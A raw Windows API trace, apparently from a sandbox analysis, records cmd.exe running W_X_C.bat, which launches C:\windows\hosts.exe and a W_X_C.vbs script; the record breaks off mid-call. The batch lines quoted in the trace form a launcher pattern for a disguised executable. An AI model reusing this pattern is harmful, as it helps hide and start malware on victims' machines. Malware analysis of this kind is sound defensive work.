MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if not exist C:\\windows\\hosts.exe goto NOFILE\r\n", cbMultiByte=47, lpWideCharStr=0x4a1cc640, cchWideChar=8191 | out: lpWideCharStr="if not exist C:\\windows\\hosts.exe goto NOFILE\r\n") returned 47 [0135.094] _get_osfhandle (_FileHandle=3) returned 0x80 [0135.094] GetFileType (hFile=0x80) returned 0x1 [0135.094] _get_osfhandle (_FileHandle=3) returned 0x80 [0135.094] SetFilePointer (in: hFile=0x80, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3a [0135.095] GetProcessHeap () returned 0x610000 [0135.095] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x400a) returned 0x626ad0 [0135.095] GetProcessHeap () returned 0x610000 [0135.095] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x626ad0 | out: hHeap=0x610000) returned 1 [0135.095] _wcsicmp (_String1="if", _String2=")") returned 64 [0135.095] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0135.095] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0135.095] _wcsicmp (_String1="IF", _String2="if") returned 0 [0135.096] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0135.096] GetProcessHeap () returned 0x610000 [0135.096] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x58) returned 0x624f68 [0135.096] GetProcessHeap () returned 0x610000 [0135.096] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xe) returned 0x6223f0 [0135.096] GetProcessHeap () returned 0x610000 [0135.096] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x18) returned 0x611350 [0135.097] GetProcessHeap () returned 0x610000 [0135.098] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x18) returned 0x6251a8 [0135.100] _tell (_FileHandle=3) returned 58 [0135.100] _close (_FileHandle=3) returned 0 [0135.100] GetFullPathNameW (in: lpFileName="C:\\windows\\hosts.exe", nBufferLength=0x208, lpBuffer=0x18efc4, lpFilePart=0x18ed70 | out: lpBuffer="C:\\windows\\hosts.exe", lpFilePart=0x18ed70*="hosts.exe") returned 0x14 [0135.100] wcsncmp (_String1="C:\\w", _String2="\\\\.\\", _MaxCount=0x4) returned -25 [0135.101] FindFirstFileExW (in: lpFileName="C:\\windows\\hosts.exe" (normalized: "c:\\windows\\hosts.exe"), fInfoLevelId=0x1, lpFindFileData=0x18ed74, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ed74) returned 0x6251c8 [0135.101] GetProcessHeap () returned 0x610000 [0135.101] RtlReAllocateHeap (Heap=0x610000, Flags=0x0, Ptr=0x6219e0, Size=0x4) returned 0x6219e0 [0135.101] FindClose (in: hFindFile=0x6251c8 | out: hFindFile=0x6251c8) returned 1 [0135.101] _get_osfhandle (_FileHandle=1) returned 0x7 [0135.101] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0135.102] _get_osfhandle (_FileHandle=1) returned 0x7 [0135.102] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1c41ac | out: lpMode=0x4a1c41ac) returned 1 [0135.102] _get_osfhandle (_FileHandle=0) returned 0x3 [0135.102] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1c41b0 | out: lpMode=0x4a1c41b0) returned 1 [0135.103] SetConsoleInputExeNameW () returned 0x1 [0135.103] GetConsoleOutputCP () returned 0x1b5 [0135.103] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1c4260 | out: lpCPInfo=0x4a1c4260) returned 1 [0135.103] SetThreadUILanguage (LangId=0x0) returned 0x409 [0135.104] CreateFileW (lpFileName="c:\\windows\\W_X_C.bat" (normalized: "c:\\windows\\w_x_c.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18f404, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x80 [0135.104] _open_osfhandle (_OSFileHandle=0x80, _Flags=8) returned 3 [0135.104] _get_osfhandle (_FileHandle=3) returned 0x80 [0135.104] SetFilePointer (in: hFile=0x80, lDistanceToMove=58, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3a [0135.104] GetProcessHeap () returned 0x610000 [0135.104] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6251a8 | out: hHeap=0x610000) returned 1 [0135.104] GetProcessHeap () returned 0x610000 [0135.104] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x625188 | out: hHeap=0x610000) returned 1 [0135.104] GetProcessHeap () returned 0x610000 [0135.104] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x625128 | out: hHeap=0x610000) returned 1 [0135.104] GetProcessHeap () returned 0x610000 [0135.104] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6250e8 | out: hHeap=0x610000) returned 1 [0135.104] GetProcessHeap () returned 0x610000 [0135.105] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6250a8 | out: hHeap=0x610000) returned 1 [0135.105] GetProcessHeap () returned 0x610000 [0135.105] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x625088 | out: hHeap=0x610000) returned 1 [0135.105] GetProcessHeap () returned 0x610000 [0135.105] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x625028 | out: hHeap=0x610000) returned 1 [0135.105] GetProcessHeap () returned 0x610000 [0135.105] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x622408 | out: hHeap=0x610000) returned 1 [0135.105] GetProcessHeap () returned 0x610000 [0135.105] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x624fc8 | out: hHeap=0x610000) returned 1 [0135.105] GetProcessHeap () returned 0x610000 [0135.105] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x611350 | out: hHeap=0x610000) returned 1 [0135.105] GetProcessHeap () returned 0x610000 [0135.105] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6223f0 | out: hHeap=0x610000) returned 1 [0135.105] GetProcessHeap () returned 0x610000 [0135.105] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x624f68 | out: hHeap=0x610000) returned 1 [0135.106] _get_osfhandle (_FileHandle=3) returned 0x80 [0135.106] SetFilePointer (in: hFile=0x80, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3a [0135.106] ReadFile (in: hFile=0x80, lpBuffer=0x4a1c6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x18f3e8, lpOverlapped=0x0 | out: lpBuffer=0x4a1c6640*, lpNumberOfBytesRead=0x18f3e8*=0x116, lpOverlapped=0x0) returned 1 [0135.106] SetFilePointer (in: hFile=0x80, lDistanceToMove=87, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x57 [0135.106] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="@start C:\\windows\\hosts.exe\r\n", cbMultiByte=29, lpWideCharStr=0x4a1cc640, cchWideChar=8191 | out: lpWideCharStr="@start C:\\windows\\hosts.exe\r\n.exe goto NOFILE\r\n") returned 29 [0135.106] _get_osfhandle (_FileHandle=3) returned 0x80 [0135.106] GetFileType (hFile=0x80) returned 0x1 [0135.106] _get_osfhandle (_FileHandle=3) returned 0x80 [0135.106] SetFilePointer (in: hFile=0x80, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x57 [0135.106] GetProcessHeap () returned 0x610000 [0135.107] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x400a) returned 0x626ad0 [0135.107] GetProcessHeap () returned 0x610000 [0135.107] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x626ad0 | out: hHeap=0x610000) returned 1 [0135.108] GetProcessHeap () returned 0x610000 [0135.108] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x34) returned 0x625028 [0135.110] _tell (_FileHandle=3) returned 87 [0135.111] _close (_FileHandle=3) returned 0 [0135.111] _wcsicmp (_String1="start", _String2="DIR") returned 15 [0135.111] _wcsicmp (_String1="start", _String2="ERASE") returned 14 [0135.111] _wcsicmp (_String1="start", _String2="DEL") returned 15 [0135.111] _wcsicmp (_String1="start", _String2="TYPE") returned -1 [0135.111] _wcsicmp (_String1="start", _String2="COPY") returned 16 [0135.111] _wcsicmp (_String1="start", _String2="CD") returned 16 [0135.111] _wcsicmp (_String1="start", _String2="CHDIR") returned 16 [0135.111] _wcsicmp (_String1="start", _String2="RENAME") returned 1 [0135.111] _wcsicmp (_String1="start", _String2="REN") returned 1 [0135.111] _wcsicmp (_String1="start", _String2="ECHO") returned 14 [0135.111] _wcsicmp (_String1="start", _String2="SET") returned 15 [0135.112] _wcsicmp (_String1="start", _String2="PAUSE") returned 3 [0135.112] _wcsicmp (_String1="start", _String2="DATE") returned 15 [0135.112] _wcsicmp (_String1="start", _String2="TIME") returned -1 [0135.112] _wcsicmp (_String1="start", _String2="PROMPT") returned 3 [0135.112] _wcsicmp (_String1="start", _String2="MD") returned 6 [0135.112] _wcsicmp (_String1="start", _String2="MKDIR") returned 6 [0135.113] _wcsicmp (_String1="start", _String2="RD") returned 1 [0135.113] _wcsicmp (_String1="start", _String2="RMDIR") returned 1 [0135.113] _wcsicmp (_String1="start", _String2="PATH") returned 3 [0135.113] _wcsicmp (_String1="start", _String2="GOTO") returned 12 [0135.113] _wcsicmp (_String1="start", _String2="SHIFT") returned 12 [0135.113] _wcsicmp (_String1="start", _String2="CLS") returned 16 [0135.113] _wcsicmp (_String1="start", _String2="CALL") returned 16 [0135.113] _wcsicmp (_String1="start", _String2="VERIFY") returned -3 [0135.113] _wcsicmp (_String1="start", _String2="VER") returned -3 [0135.113] _wcsicmp (_String1="start", _String2="VOL") returned -3 [0135.113] _wcsicmp (_String1="start", _String2="EXIT") returned 14 [0135.113] _wcsicmp (_String1="start", _String2="SETLOCAL") returned 15 [0135.113] _wcsicmp (_String1="start", _String2="ENDLOCAL") returned 14 [0135.113] _wcsicmp (_String1="start", _String2="TITLE") returned -1 [0135.114] _wcsicmp (_String1="start", _String2="START") returned 0 [0135.114] GetConsoleTitleW (in: lpConsoleTitle=0x18efcc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0135.178] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0135.178] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0135.178] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0135.178] GetFullPathNameW (in: lpFileName="C:\\windows\\.", nBufferLength=0x208, lpBuffer=0x6226a8, lpFilePart=0x172764 | out: lpBuffer="C:\\windows", lpFilePart=0x172764*="windows") returned 0xa [0135.178] SetErrorMode (uMode=0x8001) returned 0x1 [0135.178] GetProcessHeap () returned 0x610000 [0135.179] RtlReAllocateHeap (Heap=0x610000, Flags=0x0, Ptr=0x6226a0, Size=0x32) returned 0x6226a0 [0135.179] GetProcessHeap () returned 0x610000 [0135.179] RtlSizeHeap (HeapHandle=0x610000, Flags=0x0, MemoryPointer=0x6226a0) returned 0x32 [0135.179] NeedCurrentDirectoryForExePathW (ExeName="C:\\windows\\.") returned 1 [0135.179] GetProcessHeap () returned 0x610000 [0135.179] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x24) returned 0x6250f0 [0135.179] GetProcessHeap () returned 0x610000 [0135.179] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x3c) returned 0x6226f8 [0135.179] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0135.179] FindFirstFileExW (in: lpFileName="C:\\windows\\hosts.exe" (normalized: "c:\\windows\\hosts.exe"), fInfoLevelId=0x1, lpFindFileData=0x172500, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x172500) returned 0x6251d0 [0135.180] FindClose (in: hFindFile=0x6251d0 | out: hFindFile=0x6251d0) returned 1 [0135.180] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0135.180] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0135.180] GetStartupInfoW (in: lpStartupInfo=0x172a18 | out: lpStartupInfo=0x172a18*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0135.180] InitializeProcThreadAttributeList (in: lpAttributeList=0x0, dwAttributeCount=0x2, dwFlags=0x0, lpSize=0x172b0c | out: lpAttributeList=0x0, lpSize=0x172b0c) returned 0 [0135.180] GetLastError () returned 0x7a [0135.180] GetProcessHeap () returned 0x610000 [0135.180] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x2c) returned 0x6251d0 [0135.180] InitializeProcThreadAttributeList (in: lpAttributeList=0x6251d0, dwAttributeCount=0x2, dwFlags=0x0, lpSize=0x172b0c | out: lpAttributeList=0x6251d0, lpSize=0x172b0c) returned 1 [0135.180] UpdateProcThreadAttribute (in: lpAttributeList=0x6251d0, dwFlags=0x0, Attribute=0x60001, lpValue=0x172ae4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x6251d0, lpPreviousValue=0x0) returned 1 [0135.180] CreateProcessW (in: lpApplicationName="C:\\windows\\hosts.exe", lpCommandLine="C:\\windows\\hosts.exe ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80410, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x172a9c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x3, hStdOutput=0x7, hStdError=0xb), lpProcessInformation=0x172af4 | out: lpCommandLine="C:\\windows\\hosts.exe ", lpProcessInformation=0x172af4*(hProcess=0x7c, hThread=0x80, dwProcessId=0xaa0, dwThreadId=0xa98)) returned 1 [0135.498] DeleteProcThreadAttributeList (in: lpAttributeList=0x6251d0 | out: lpAttributeList=0x6251d0) [0135.498] GetProcessHeap () returned 0x610000 [0135.498] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6251d0 | out: hHeap=0x610000) returned 1 [0135.498] GetLastError () returned 0x715 [0135.498] ResumeThread (hThread=0x80) returned 0x0 [0135.498] CloseHandle (hObject=0x80) returned 1 [0135.498] CloseHandle (hObject=0x7c) returned 1 [0135.498] _get_osfhandle (_FileHandle=1) returned 0x7 [0135.498] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0135.499] _get_osfhandle (_FileHandle=1) returned 0x7 [0135.499] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1c41ac | out: lpMode=0x4a1c41ac) returned 1 [0135.499] _get_osfhandle (_FileHandle=0) returned 0x3 [0135.499] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1c41b0 | out: lpMode=0x4a1c41b0) returned 1 [0135.499] SetConsoleInputExeNameW () returned 0x1 [0135.499] GetConsoleOutputCP () returned 0x1b5 [0135.500] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1c4260 | out: lpCPInfo=0x4a1c4260) returned 1 [0135.500] SetThreadUILanguage (LangId=0x0) returned 0x409 [0135.500] CreateFileW (lpFileName="c:\\windows\\W_X_C.bat" (normalized: "c:\\windows\\w_x_c.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18f404, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7c [0135.500] _open_osfhandle (_OSFileHandle=0x7c, _Flags=8) returned 3 [0135.500] _get_osfhandle (_FileHandle=3) returned 0x7c [0135.500] SetFilePointer (in: hFile=0x7c, lDistanceToMove=87, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x57 [0135.500] GetProcessHeap () returned 0x610000 [0135.500] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x625150 | out: hHeap=0x610000) returned 1 [0135.500] GetProcessHeap () returned 0x610000 [0135.500] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x625120 | out: hHeap=0x610000) returned 1 [0135.500] GetProcessHeap () returned 0x610000 [0135.500] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6250f0 | out: hHeap=0x610000) returned 1 [0135.500] GetProcessHeap () returned 0x610000 [0135.500] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6226a0 | out: hHeap=0x610000) returned 1 [0135.500] GetProcessHeap () returned 0x610000 [0135.501] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6250a8 | out: hHeap=0x610000) returned 1 [0135.501] GetProcessHeap () returned 0x610000 [0135.501] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x625068 | out: hHeap=0x610000) returned 1 [0135.501] GetProcessHeap () returned 0x610000 [0135.501] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x625028 | out: hHeap=0x610000) returned 1 [0135.501] GetProcessHeap () returned 0x610000 [0135.501] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x611350 | out: hHeap=0x610000) returned 1 [0135.501] GetProcessHeap () returned 0x610000 [0135.501] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x624fc8 | out: hHeap=0x610000) returned 1 [0135.501] GetProcessHeap () returned 0x610000 [0135.501] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x624f68 | out: hHeap=0x610000) returned 1 [0135.501] _get_osfhandle (_FileHandle=3) returned 0x7c [0135.501] SetFilePointer (in: hFile=0x7c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x57 [0135.501] ReadFile (in: hFile=0x7c, lpBuffer=0x4a1c6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x18f3e8, lpOverlapped=0x0 | out: lpBuffer=0x4a1c6640*, lpNumberOfBytesRead=0x18f3e8*=0xf9, lpOverlapped=0x0) returned 1 [0135.503] SetFilePointer (in: hFile=0x7c, lDistanceToMove=105, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x69 [0135.503] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="@start W_X_C.vbs\r\n", cbMultiByte=18, lpWideCharStr=0x4a1cc640, cchWideChar=8191 | out: lpWideCharStr="@start W_X_C.vbs\r\nhosts.exe\r\n.exe goto NOFILE\r\n") returned 18 [0135.503] _get_osfhandle (_FileHandle=3) returned 0x7c [0135.503] GetFileType (hFile=0x7c) returned 0x1 [0135.503] _get_osfhandle (_FileHandle=3) returned 0x7c [0135.503] SetFilePointer (in: hFile=0x7c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x69 [0135.503] GetProcessHeap () returned 0x610000 [0135.503] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x400a) returned 0x628dd8 [0135.504] GetProcessHeap () returned 0x610000 [0135.504] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x628dd8 | out: hHeap=0x610000) returned 1 [0135.504] GetProcessHeap () returned 0x610000 [0135.505] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x1e) returned 0x6247d0 [0135.506] _tell (_FileHandle=3) returned 105 [0135.506] _close (_FileHandle=3) returned 0 [0135.506] _wcsicmp (_String1="start", _String2="DIR") returned 15 [0135.506] _wcsicmp (_String1="start", _String2="ERASE") returned 14 [0135.506] _wcsicmp (_String1="start", _String2="DEL") returned 15 [0135.507] _wcsicmp (_String1="start", _String2="TYPE") returned -1 [0135.507] _wcsicmp (_String1="start", _String2="COPY") returned 16 [0135.507] _wcsicmp (_String1="start", _String2="CD") returned 16 [0135.507] _wcsicmp (_String1="start", _String2="CHDIR") returned 16 [0135.507] _wcsicmp (_String1="start", _String2="RENAME") returned 1 [0135.507] _wcsicmp (_String1="start", _String2="REN") returned 1 [0135.507] _wcsicmp (_String1="start", _String2="ECHO") returned 14 [0135.507] _wcsicmp (_String1="start", _String2="SET") returned 15 [0135.507] _wcsicmp (_String1="start", _String2="PAUSE") returned 3 [0135.507] _wcsicmp (_String1="start", _String2="DATE") returned 15 [0135.507] _wcsicmp (_String1="start", _String2="TIME") returned -1 [0135.507] _wcsicmp (_String1="start", _String2="PROMPT") returned 3 [0135.507] _wcsicmp (_String1="start", _String2="MD") returned 6 [0135.507] _wcsicmp (_String1="start", _String2="MKDIR") returned 6 [0135.507] _wcsicmp (_String1="start", _String2="RD") returned 1 [0135.507] _wcsicmp (_String1="start", _String2="RMDIR") returned 1 [0135.507] _wcsicmp (_String1="start", _String2="PATH") returned 3 [0135.507] _wcsicmp (_String1="start", _String2="GOTO") returned 12 [0135.507] _wcsicmp (_String1="start", _String2="SHIFT") returned 12 [0135.507] _wcsicmp (_String1="start", _String2="CLS") returned 16 [0135.508] _wcsicmp (_String1="start", _String2="CALL") returned 16 [0135.508] _wcsicmp (_String1="start", _String2="VERIFY") returned -3 [0135.508] _wcsicmp (_String1="start", _String2="VER") returned -3 [0135.508] _wcsicmp (_String1="start", _String2="VOL") returned -3 [0135.508] _wcsicmp (_String1="start", _String2="EXIT") returned 14 [0135.508] _wcsicmp (_String1="start", _String2="SETLOCAL") returned 15 [0135.508] _wcsicmp (_String1="start", _String2="ENDLOCAL") returned 14 [0135.508] _wcsicmp (_String1="start", _String2="TITLE") returned -1 [0135.508] _wcsicmp (_String1="start", _String2="START") returned 0 [0135.508] GetConsoleTitleW (in: lpConsoleTitle=0x18efcc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0135.509] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0135.509] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0135.509] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0135.509] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x628de0, lpFilePart=0x172764 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop", lpFilePart=0x172764*="Desktop") returned 0x1a [0135.509] SetErrorMode (uMode=0x8001) returned 0x1 [0135.509] GetProcessHeap () returned 0x610000 [0135.510] RtlReAllocateHeap (Heap=0x610000, Flags=0x0, Ptr=0x628dd8, Size=0x52) returned 0x628dd8 [0135.510] GetProcessHeap () returned 0x610000 [0135.510] RtlSizeHeap (HeapHandle=0x610000, Flags=0x0, MemoryPointer=0x628dd8) returned 0x52 [0135.510] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a1d0640, nSize=0x2000 | out: lpBuffer="") returned 0xc8 [0135.510] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0135.510] GetProcessHeap () returned 0x610000 [0135.510] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x1d4) returned 0x6237d8 [0135.510] GetProcessHeap () returned 0x610000 [0135.510] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x3a0) returned 0x624f68 [0135.510] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0135.510] FindFirstFileExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\W_X_C.vbs" (normalized: "c:\\users\\keecfmwgj\\desktop\\w_x_c.vbs"), fInfoLevelId=0x1, lpFindFileData=0x172500, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x172500) returned 0xffffffff [0135.511] GetLastError () returned 0x2 [0135.511] FindFirstFileExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\W_X_C.vbs.*" (normalized: "c:\\users\\keecfmwgj\\desktop\\w_x_c.vbs.*"), fInfoLevelId=0x1, lpFindFileData=0x1724e0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1724e0) returned 0xffffffff [0135.511] GetLastError () returned 0x2 [0135.511] FindFirstFileExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\W_X_C.vbs" (normalized: "c:\\users\\keecfmwgj\\desktop\\w_x_c.vbs"), fInfoLevelId=0x1, lpFindFileData=0x1724e0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1724e0) returned 0xffffffff [0135.511] GetLastError () returned 0x2 [0135.511] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0135.512] FindFirstFileExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\W_X_C.vbs" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\w_x_c.vbs"), fInfoLevelId=0x1, lpFindFileData=0x172500, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x172500) returned 0xffffffff [0135.514] GetLastError () returned 0x2 [0135.514] FindFirstFileExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\W_X_C.vbs.*" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\w_x_c.vbs.*"), fInfoLevelId=0x1, lpFindFileData=0x1724e0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1724e0) returned 0xffffffff [0135.514] GetLastError () returned 0x2 [0135.514] FindFirstFileExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\W_X_C.vbs" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\w_x_c.vbs"), fInfoLevelId=0x1, lpFindFileData=0x1724e0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1724e0) returned 0xffffffff [0135.515] GetLastError () returned 0x2 [0135.515] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0135.515] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\W_X_C.vbs" (normalized: "c:\\windows\\syswow64\\w_x_c.vbs"), fInfoLevelId=0x1, lpFindFileData=0x172500, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x172500) returned 0xffffffff [0135.515] GetLastError () returned 0x2 [0135.515] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\W_X_C.vbs.*" (normalized: "c:\\windows\\syswow64\\w_x_c.vbs.*"), fInfoLevelId=0x1, lpFindFileData=0x1724e0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1724e0) returned 0xffffffff [0135.515] GetLastError () returned 0x2 [0135.515] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\W_X_C.vbs" (normalized: "c:\\windows\\syswow64\\w_x_c.vbs"), fInfoLevelId=0x1, lpFindFileData=0x1724e0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1724e0) returned 0xffffffff [0135.516] GetLastError () returned 0x2 [0135.516] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0135.516] FindFirstFileExW (in: lpFileName="C:\\Windows\\W_X_C.vbs" (normalized: "c:\\windows\\w_x_c.vbs"), fInfoLevelId=0x1, lpFindFileData=0x172500, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x172500) returned 0x6251c8 [0135.516] FindClose (in: hFindFile=0x6251c8 | out: hFindFile=0x6251c8) returned 1 [0135.516] _wcsicmp (_String1=".vbs", _String2=".CMD") returned 19 [0135.516] _wcsicmp (_String1=".vbs", _String2=".BAT") returned 20 [0135.516] GetStartupInfoW (in: lpStartupInfo=0x172a18 | out: lpStartupInfo=0x172a18*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0135.517] InitializeProcThreadAttributeList (in: lpAttributeList=0x0, dwAttributeCount=0x2, dwFlags=0x0, lpSize=0x172b0c | out: lpAttributeList=0x0, lpSize=0x172b0c) returned 0 [0135.517] GetLastError () returned 0x7a [0135.517] GetProcessHeap () returned 0x610000 [0135.517] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x2c) returned 0x6251c8 [0135.517] 